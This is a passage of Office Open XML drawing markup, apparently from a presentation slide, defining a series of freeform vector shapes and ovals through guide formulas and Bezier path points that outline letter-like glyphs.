                  <a:gd name="T20" fmla="*/ 7 w 15"/>
                  <a:gd name="T21" fmla="*/ 10 h 31"/>
                  <a:gd name="T22" fmla="*/ 7 w 15"/>
                  <a:gd name="T23" fmla="*/ 23 h 31"/>
                  <a:gd name="T24" fmla="*/ 11 w 15"/>
                  <a:gd name="T25" fmla="*/ 27 h 31"/>
                  <a:gd name="T26" fmla="*/ 14 w 15"/>
                  <a:gd name="T27" fmla="*/ 27 h 31"/>
                  <a:gd name="T28" fmla="*/ 15 w 15"/>
                  <a:gd name="T29" fmla="*/ 30 h 31"/>
                  <a:gd name="T30" fmla="*/ 10 w 15"/>
                  <a:gd name="T31" fmla="*/ 31 h 31"/>
                  <a:gd name="T32" fmla="*/ 3 w 15"/>
                  <a:gd name="T33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1">
                    <a:moveTo>
                      <a:pt x="3" y="23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23"/>
                      <a:pt x="7" y="23"/>
                      <a:pt x="7" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="26"/>
                      <a:pt x="8" y="27"/>
                      <a:pt x="11" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="27"/>
                      <a:pt x="13" y="27"/>
                      <a:pt x="14" y="27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0"/>
                      <a:pt x="12" y="31"/>
                      <a:pt x="10" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="3" y="27"/>
                      <a:pt x="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7" name="Freeform 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04EDAA01-E905-9C4C-9FDA-681310246D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86504" y="2271563"/>
                <a:ext cx="41670" cy="52089"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 20"/>
                  <a:gd name="T1" fmla="*/ 12 h 25"/>
                  <a:gd name="T2" fmla="*/ 11 w 20"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 20 w 20"/>
                  <a:gd name="T5" fmla="*/ 11 h 25"/>
                  <a:gd name="T6" fmla="*/ 20 w 20"/>
                  <a:gd name="T7" fmla="*/ 13 h 25"/>
                  <a:gd name="T8" fmla="*/ 4 w 20"/>
                  <a:gd name="T9" fmla="*/ 13 h 25"/>
                  <a:gd name="T10" fmla="*/ 12 w 20"/>
                  <a:gd name="T11" fmla="*/ 21 h 25"/>
                  <a:gd name="T12" fmla="*/ 18 w 20"/>
                  <a:gd name="T13" fmla="*/ 20 h 25"/>
                  <a:gd name="T14" fmla="*/ 19 w 20"/>
                  <a:gd name="T15" fmla="*/ 22 h 25"/>
                  <a:gd name="T16" fmla="*/ 11 w 20"/>
                  <a:gd name="T17" fmla="*/ 25 h 25"/>
                  <a:gd name="T18" fmla="*/ 0 w 20"/>
                  <a:gd name="T19" fmla="*/ 12 h 25"/>
                  <a:gd name="T20" fmla="*/ 17 w 20"/>
                  <a:gd name="T21" fmla="*/ 10 h 25"/>
                  <a:gd name="T22" fmla="*/ 11 w 20"/>
                  <a:gd name="T23" fmla="*/ 3 h 25"/>
                  <a:gd name="T24" fmla="*/ 4 w 20"/>
                  <a:gd name="T25" fmla="*/ 10 h 25"/>
                  <a:gd name="T26" fmla="*/ 17 w 20"/>
                  <a:gd name="T27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25">
                    <a:moveTo>
                      <a:pt x="0" y="12"/>
                    </a:move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0" y="4"/>
                      <a:pt x="20" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="12"/>
                      <a:pt x="20" y="13"/>
                      <a:pt x="20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8"/>
                      <a:pt x="7" y="21"/>
                      <a:pt x="12" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="21"/>
                      <a:pt x="16" y="21"/>
                      <a:pt x="18" y="2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7" y="23"/>
                      <a:pt x="14" y="25"/>
                      <a:pt x="11" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="25"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="0" y="12"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17" y="10"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="5"/>
                      <a:pt x="14" y="3"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="3"/>
                      <a:pt x="4" y="6"/>
                      <a:pt x="4" y="10"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1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8" name="Freeform 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FE5E6EF-103D-844C-A1CF-B9A058EB6D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9009" y="2271563"/>
                <a:ext cx="27780" cy="48615"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 13"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 3 w 13"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 13"/>
                  <a:gd name="T5" fmla="*/ 5 h 24"/>
                  <a:gd name="T6" fmla="*/ 4 w 13"/>
                  <a:gd name="T7" fmla="*/ 5 h 24"/>
                  <a:gd name="T8" fmla="*/ 10 w 13"/>
                  <a:gd name="T9" fmla="*/ 0 h 24"/>
                  <a:gd name="T10" fmla="*/ 13 w 13"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 12 w 13"/>
                  <a:gd name="T13" fmla="*/ 4 h 24"/>
                  <a:gd name="T14" fmla="*/ 10 w 13"/>
                  <a:gd name="T15" fmla="*/ 3 h 24"/>
                  <a:gd name="T16" fmla="*/ 4 w 13"/>
                  <a:gd name="T17" fmla="*/ 9 h 24"/>
                  <a:gd name="T18" fmla="*/ 4 w 13"/>
                  <a:gd name="T19" fmla="*/ 24 h 24"/>
                  <a:gd name="T20" fmla="*/ 0 w 13"/>
                  <a:gd name="T21" fmla="*/ 24 h 24"/>
                  <a:gd name="T22" fmla="*/ 0 w 13"/>
                  <a:gd name="T2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24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2"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="10" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="0"/>
                      <a:pt x="12" y="0"/>
                      <a:pt x="13" y="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3"/>
                      <a:pt x="11" y="3"/>
                      <a:pt x="10" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="3"/>
                      <a:pt x="5" y="5"/>
                      <a:pt x="4" y="9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39" name="Freeform 51">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE005E76-1BDB-3D4A-AA5B-8C742B4E51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94153" y="2271563"/>
                <a:ext cx="45141" cy="69450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 21"/>
                  <a:gd name="T1" fmla="*/ 0 h 34"/>
                  <a:gd name="T2" fmla="*/ 4 w 21"/>
                  <a:gd name="T3" fmla="*/ 0 h 34"/>
                  <a:gd name="T4" fmla="*/ 4 w 21"/>
                  <a:gd name="T5" fmla="*/ 3 h 34"/>
                  <a:gd name="T6" fmla="*/ 4 w 21"/>
                  <a:gd name="T7" fmla="*/ 3 h 34"/>
                  <a:gd name="T8" fmla="*/ 12 w 21"/>
                  <a:gd name="T9" fmla="*/ 0 h 34"/>
                  <a:gd name="T10" fmla="*/ 21 w 21"/>
                  <a:gd name="T11" fmla="*/ 12 h 34"/>
                  <a:gd name="T12" fmla="*/ 11 w 21"/>
                  <a:gd name="T13" fmla="*/ 25 h 34"/>
                  <a:gd name="T14" fmla="*/ 4 w 21"/>
                  <a:gd name="T15" fmla="*/ 22 h 34"/>
                  <a:gd name="T16" fmla="*/ 4 w 21"/>
                  <a:gd name="T17" fmla="*/ 26 h 34"/>
                  <a:gd name="T18" fmla="*/ 4 w 21"/>
                  <a:gd name="T19" fmla="*/ 34 h 34"/>
                  <a:gd name="T20" fmla="*/ 0 w 21"/>
                  <a:gd name="T21" fmla="*/ 34 h 34"/>
                  <a:gd name="T22" fmla="*/ 0 w 21"/>
                  <a:gd name="T23" fmla="*/ 0 h 34"/>
                  <a:gd name="T24" fmla="*/ 17 w 21"/>
                  <a:gd name="T25" fmla="*/ 12 h 34"/>
                  <a:gd name="T26" fmla="*/ 11 w 21"/>
                  <a:gd name="T27" fmla="*/ 3 h 34"/>
                  <a:gd name="T28" fmla="*/ 4 w 21"/>
                  <a:gd name="T29" fmla="*/ 6 h 34"/>
                  <a:gd name="T30" fmla="*/ 4 w 21"/>
                  <a:gd name="T31" fmla="*/ 19 h 34"/>
                  <a:gd name="T32" fmla="*/ 10 w 21"/>
                  <a:gd name="T33" fmla="*/ 21 h 34"/>
                  <a:gd name="T34" fmla="*/ 17 w 21"/>
                  <a:gd name="T35" fmla="*/ 1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" h="3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1"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="12" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="0"/>
                      <a:pt x="21" y="5"/>
                      <a:pt x="21" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="20"/>
                      <a:pt x="16" y="25"/>
                      <a:pt x="11" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="25"/>
                      <a:pt x="6" y="24"/>
                      <a:pt x="4" y="22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0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="7"/>
                      <a:pt x="15" y="3"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="3"/>
                      <a:pt x="7" y="4"/>
                      <a:pt x="4" y="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6" y="21"/>
                      <a:pt x="8" y="21"/>
                      <a:pt x="10" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="21"/>
                      <a:pt x="17" y="18"/>
                      <a:pt x="1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0" name="Freeform 52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C780E3D3-DCF4-9A41-92A2-7194F378E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0129" y="2271563"/>
                <a:ext cx="27780" cy="48615"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 13"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 3 w 13"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 13"/>
                  <a:gd name="T5" fmla="*/ 5 h 24"/>
                  <a:gd name="T6" fmla="*/ 4 w 13"/>
                  <a:gd name="T7" fmla="*/ 5 h 24"/>
                  <a:gd name="T8" fmla="*/ 11 w 13"/>
                  <a:gd name="T9" fmla="*/ 0 h 24"/>
                  <a:gd name="T10" fmla="*/ 13 w 13"/>
                  <a:gd name="T11" fmla="*/ 0 h 24"/>
                  <a:gd name="T12" fmla="*/ 12 w 13"/>
                  <a:gd name="T13" fmla="*/ 4 h 24"/>
                  <a:gd name="T14" fmla="*/ 10 w 13"/>
                  <a:gd name="T15" fmla="*/ 3 h 24"/>
                  <a:gd name="T16" fmla="*/ 4 w 13"/>
                  <a:gd name="T17" fmla="*/ 9 h 24"/>
                  <a:gd name="T18" fmla="*/ 4 w 13"/>
                  <a:gd name="T19" fmla="*/ 24 h 24"/>
                  <a:gd name="T20" fmla="*/ 0 w 13"/>
                  <a:gd name="T21" fmla="*/ 24 h 24"/>
                  <a:gd name="T22" fmla="*/ 0 w 13"/>
                  <a:gd name="T2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24">
                    <a:moveTo>
                      <a:pt x="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2"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="11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3"/>
                      <a:pt x="11" y="3"/>
                      <a:pt x="10" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="3"/>
                      <a:pt x="6" y="5"/>
                      <a:pt x="4" y="9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1" name="Freeform 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51F24215-7440-8843-AA50-6AFAC2944C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05273" y="2250728"/>
                <a:ext cx="10416" cy="69450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 5"/>
                  <a:gd name="T1" fmla="*/ 3 h 34"/>
                  <a:gd name="T2" fmla="*/ 3 w 5"/>
                  <a:gd name="T3" fmla="*/ 0 h 34"/>
                  <a:gd name="T4" fmla="*/ 5 w 5"/>
                  <a:gd name="T5" fmla="*/ 3 h 34"/>
                  <a:gd name="T6" fmla="*/ 3 w 5"/>
                  <a:gd name="T7" fmla="*/ 5 h 34"/>
                  <a:gd name="T8" fmla="*/ 0 w 5"/>
                  <a:gd name="T9" fmla="*/ 3 h 34"/>
                  <a:gd name="T10" fmla="*/ 1 w 5"/>
                  <a:gd name="T11" fmla="*/ 10 h 34"/>
                  <a:gd name="T12" fmla="*/ 5 w 5"/>
                  <a:gd name="T13" fmla="*/ 10 h 34"/>
                  <a:gd name="T14" fmla="*/ 5 w 5"/>
                  <a:gd name="T15" fmla="*/ 34 h 34"/>
                  <a:gd name="T16" fmla="*/ 1 w 5"/>
                  <a:gd name="T17" fmla="*/ 34 h 34"/>
                  <a:gd name="T18" fmla="*/ 1 w 5"/>
                  <a:gd name="T19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4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lose/>
                    <a:moveTo>
                      <a:pt x="1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" y="34"/>
                      <a:pt x="1" y="34"/>
                      <a:pt x="1" y="34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2" name="Freeform 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72F88D22-A54C-3E46-B5FC-123057C13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6525" y="2271563"/>
                <a:ext cx="34725" cy="52089"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 17"/>
                  <a:gd name="T1" fmla="*/ 21 h 25"/>
                  <a:gd name="T2" fmla="*/ 2 w 17"/>
                  <a:gd name="T3" fmla="*/ 19 h 25"/>
                  <a:gd name="T4" fmla="*/ 9 w 17"/>
                  <a:gd name="T5" fmla="*/ 21 h 25"/>
                  <a:gd name="T6" fmla="*/ 13 w 17"/>
                  <a:gd name="T7" fmla="*/ 18 h 25"/>
                  <a:gd name="T8" fmla="*/ 8 w 17"/>
                  <a:gd name="T9" fmla="*/ 13 h 25"/>
                  <a:gd name="T10" fmla="*/ 1 w 17"/>
                  <a:gd name="T11" fmla="*/ 6 h 25"/>
                  <a:gd name="T12" fmla="*/ 9 w 17"/>
                  <a:gd name="T13" fmla="*/ 0 h 25"/>
                  <a:gd name="T14" fmla="*/ 16 w 17"/>
                  <a:gd name="T15" fmla="*/ 2 h 25"/>
                  <a:gd name="T16" fmla="*/ 14 w 17"/>
                  <a:gd name="T17" fmla="*/ 5 h 25"/>
                  <a:gd name="T18" fmla="*/ 9 w 17"/>
                  <a:gd name="T19" fmla="*/ 3 h 25"/>
                  <a:gd name="T20" fmla="*/ 5 w 17"/>
                  <a:gd name="T21" fmla="*/ 6 h 25"/>
                  <a:gd name="T22" fmla="*/ 10 w 17"/>
                  <a:gd name="T23" fmla="*/ 10 h 25"/>
                  <a:gd name="T24" fmla="*/ 17 w 17"/>
                  <a:gd name="T25" fmla="*/ 18 h 25"/>
                  <a:gd name="T26" fmla="*/ 8 w 17"/>
                  <a:gd name="T27" fmla="*/ 25 h 25"/>
                  <a:gd name="T28" fmla="*/ 0 w 17"/>
                  <a:gd name="T29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" h="25">
                    <a:moveTo>
                      <a:pt x="0" y="21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4" y="20"/>
                      <a:pt x="6" y="21"/>
                      <a:pt x="9" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="21"/>
                      <a:pt x="13" y="20"/>
                      <a:pt x="13" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="15"/>
                      <a:pt x="10" y="14"/>
                      <a:pt x="8" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="12"/>
                      <a:pt x="1" y="10"/>
                      <a:pt x="1" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="3"/>
                      <a:pt x="4" y="0"/>
                      <a:pt x="9" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="0"/>
                      <a:pt x="14" y="1"/>
                      <a:pt x="16" y="2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4"/>
                      <a:pt x="11" y="3"/>
                      <a:pt x="9" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="3"/>
                      <a:pt x="5" y="4"/>
                      <a:pt x="5" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="9"/>
                      <a:pt x="7" y="9"/>
                      <a:pt x="10" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="12"/>
                      <a:pt x="17" y="13"/>
                      <a:pt x="17" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="21"/>
                      <a:pt x="14" y="25"/>
                      <a:pt x="8" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="25"/>
                      <a:pt x="2" y="23"/>
                      <a:pt x="0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3" name="Freeform 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B0108A4-4BA0-654F-A4BC-3F2E0EA6E4E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92085" y="2271563"/>
                <a:ext cx="41670" cy="52089"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 20"/>
                  <a:gd name="T1" fmla="*/ 12 h 25"/>
                  <a:gd name="T2" fmla="*/ 11 w 20"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 20 w 20"/>
                  <a:gd name="T5" fmla="*/ 11 h 25"/>
                  <a:gd name="T6" fmla="*/ 20 w 20"/>
                  <a:gd name="T7" fmla="*/ 13 h 25"/>
                  <a:gd name="T8" fmla="*/ 4 w 20"/>
                  <a:gd name="T9" fmla="*/ 13 h 25"/>
                  <a:gd name="T10" fmla="*/ 12 w 20"/>
                  <a:gd name="T11" fmla="*/ 21 h 25"/>
                  <a:gd name="T12" fmla="*/ 18 w 20"/>
                  <a:gd name="T13" fmla="*/ 20 h 25"/>
                  <a:gd name="T14" fmla="*/ 19 w 20"/>
                  <a:gd name="T15" fmla="*/ 22 h 25"/>
                  <a:gd name="T16" fmla="*/ 12 w 20"/>
                  <a:gd name="T17" fmla="*/ 25 h 25"/>
                  <a:gd name="T18" fmla="*/ 0 w 20"/>
                  <a:gd name="T19" fmla="*/ 12 h 25"/>
                  <a:gd name="T20" fmla="*/ 17 w 20"/>
                  <a:gd name="T21" fmla="*/ 10 h 25"/>
                  <a:gd name="T22" fmla="*/ 11 w 20"/>
                  <a:gd name="T23" fmla="*/ 3 h 25"/>
                  <a:gd name="T24" fmla="*/ 4 w 20"/>
                  <a:gd name="T25" fmla="*/ 10 h 25"/>
                  <a:gd name="T26" fmla="*/ 17 w 20"/>
                  <a:gd name="T27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25">
                    <a:moveTo>
                      <a:pt x="0" y="12"/>
                    </a:move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0" y="4"/>
                      <a:pt x="20" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="12"/>
                      <a:pt x="20" y="13"/>
                      <a:pt x="20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8"/>
                      <a:pt x="8" y="21"/>
                      <a:pt x="12" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="21"/>
                      <a:pt x="16" y="21"/>
                      <a:pt x="18" y="2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7" y="23"/>
                      <a:pt x="15" y="25"/>
                      <a:pt x="12" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="25"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="0" y="12"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17" y="10"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="5"/>
                      <a:pt x="15" y="3"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="3"/>
                      <a:pt x="5" y="6"/>
                      <a:pt x="4" y="10"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1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4" name="Oval 56">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C963D6E3-38E0-D946-B3BA-47B5431FCB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2370" y="2275036"/>
                <a:ext cx="10416" cy="1389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5" name="Freeform 57">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6D5C725-B3E7-014F-A4CD-6E0F0600F1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44875" y="2250728"/>
                <a:ext cx="10416" cy="69450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 5"/>
                  <a:gd name="T1" fmla="*/ 3 h 34"/>
                  <a:gd name="T2" fmla="*/ 2 w 5"/>
                  <a:gd name="T3" fmla="*/ 0 h 34"/>
                  <a:gd name="T4" fmla="*/ 5 w 5"/>
                  <a:gd name="T5" fmla="*/ 3 h 34"/>
                  <a:gd name="T6" fmla="*/ 2 w 5"/>
                  <a:gd name="T7" fmla="*/ 5 h 34"/>
                  <a:gd name="T8" fmla="*/ 0 w 5"/>
                  <a:gd name="T9" fmla="*/ 3 h 34"/>
                  <a:gd name="T10" fmla="*/ 0 w 5"/>
                  <a:gd name="T11" fmla="*/ 10 h 34"/>
                  <a:gd name="T12" fmla="*/ 4 w 5"/>
                  <a:gd name="T13" fmla="*/ 10 h 34"/>
                  <a:gd name="T14" fmla="*/ 4 w 5"/>
                  <a:gd name="T15" fmla="*/ 34 h 34"/>
                  <a:gd name="T16" fmla="*/ 0 w 5"/>
                  <a:gd name="T17" fmla="*/ 34 h 34"/>
                  <a:gd name="T18" fmla="*/ 0 w 5"/>
                  <a:gd name="T19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4">
                    <a:moveTo>
                      <a:pt x="0" y="3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lose/>
                    <a:moveTo>
                      <a:pt x="0" y="10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6" name="Freeform 58">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1C709F3-6928-2343-A147-B2E68A931A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76128" y="2271563"/>
                <a:ext cx="45141" cy="52089"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 22"/>
                  <a:gd name="T1" fmla="*/ 12 h 25"/>
                  <a:gd name="T2" fmla="*/ 11 w 22"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 22 w 22"/>
                  <a:gd name="T5" fmla="*/ 12 h 25"/>
                  <a:gd name="T6" fmla="*/ 11 w 22"/>
                  <a:gd name="T7" fmla="*/ 25 h 25"/>
                  <a:gd name="T8" fmla="*/ 0 w 22"/>
                  <a:gd name="T9" fmla="*/ 12 h 25"/>
                  <a:gd name="T10" fmla="*/ 18 w 22"/>
                  <a:gd name="T11" fmla="*/ 12 h 25"/>
                  <a:gd name="T12" fmla="*/ 11 w 22"/>
                  <a:gd name="T13" fmla="*/ 3 h 25"/>
                  <a:gd name="T14" fmla="*/ 4 w 22"/>
                  <a:gd name="T15" fmla="*/ 12 h 25"/>
                  <a:gd name="T16" fmla="*/ 11 w 22"/>
                  <a:gd name="T17" fmla="*/ 21 h 25"/>
                  <a:gd name="T18" fmla="*/ 18 w 22"/>
                  <a:gd name="T19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5">
                    <a:moveTo>
                      <a:pt x="0" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="4"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="11" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="0"/>
                      <a:pt x="22" y="4"/>
                      <a:pt x="22" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="20"/>
                      <a:pt x="17" y="25"/>
                      <a:pt x="11" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="25"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="0" y="12"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="18" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="7"/>
                      <a:pt x="15" y="3"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="3"/>
                      <a:pt x="4" y="7"/>
                      <a:pt x="4" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4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7" name="Freeform 59">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{682431C3-5775-4543-AEEA-FE19996BA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8634" y="2257673"/>
                <a:ext cx="31251" cy="65979"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 15"/>
                  <a:gd name="T1" fmla="*/ 23 h 31"/>
                  <a:gd name="T2" fmla="*/ 4 w 15"/>
                  <a:gd name="T3" fmla="*/ 10 h 31"/>
                  <a:gd name="T4" fmla="*/ 0 w 15"/>
                  <a:gd name="T5" fmla="*/ 10 h 31"/>
                  <a:gd name="T6" fmla="*/ 0 w 15"/>
                  <a:gd name="T7" fmla="*/ 7 h 31"/>
                  <a:gd name="T8" fmla="*/ 4 w 15"/>
                  <a:gd name="T9" fmla="*/ 6 h 31"/>
                  <a:gd name="T10" fmla="*/ 4 w 15"/>
                  <a:gd name="T11" fmla="*/ 0 h 31"/>
                  <a:gd name="T12" fmla="*/ 8 w 15"/>
                  <a:gd name="T13" fmla="*/ 0 h 31"/>
                  <a:gd name="T14" fmla="*/ 8 w 15"/>
                  <a:gd name="T15" fmla="*/ 6 h 31"/>
                  <a:gd name="T16" fmla="*/ 14 w 15"/>
                  <a:gd name="T17" fmla="*/ 6 h 31"/>
                  <a:gd name="T18" fmla="*/ 14 w 15"/>
                  <a:gd name="T19" fmla="*/ 10 h 31"/>
                  <a:gd name="T20" fmla="*/ 8 w 15"/>
                  <a:gd name="T21" fmla="*/ 10 h 31"/>
                  <a:gd name="T22" fmla="*/ 8 w 15"/>
                  <a:gd name="T23" fmla="*/ 23 h 31"/>
                  <a:gd name="T24" fmla="*/ 11 w 15"/>
                  <a:gd name="T25" fmla="*/ 27 h 31"/>
                  <a:gd name="T26" fmla="*/ 14 w 15"/>
                  <a:gd name="T27" fmla="*/ 27 h 31"/>
                  <a:gd name="T28" fmla="*/ 15 w 15"/>
                  <a:gd name="T29" fmla="*/ 30 h 31"/>
                  <a:gd name="T30" fmla="*/ 10 w 15"/>
                  <a:gd name="T31" fmla="*/ 31 h 31"/>
                  <a:gd name="T32" fmla="*/ 4 w 15"/>
                  <a:gd name="T33" fmla="*/ 2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5" h="31">
                    <a:moveTo>
                      <a:pt x="4" y="23"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="10"/>
                      <a:pt x="4" y="10"/>
                      <a:pt x="4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8" y="26"/>
                      <a:pt x="9" y="27"/>
                      <a:pt x="11" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="27"/>
                      <a:pt x="13" y="27"/>
                      <a:pt x="14" y="27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3" y="30"/>
                      <a:pt x="12" y="31"/>
                      <a:pt x="10" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="4" y="27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8" name="Oval 60">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EE99C4D-7F08-F34B-8F1E-4B247DCE12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5029" y="2275036"/>
                <a:ext cx="10416" cy="1389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9" name="Freeform 61">
                <a:extLst>
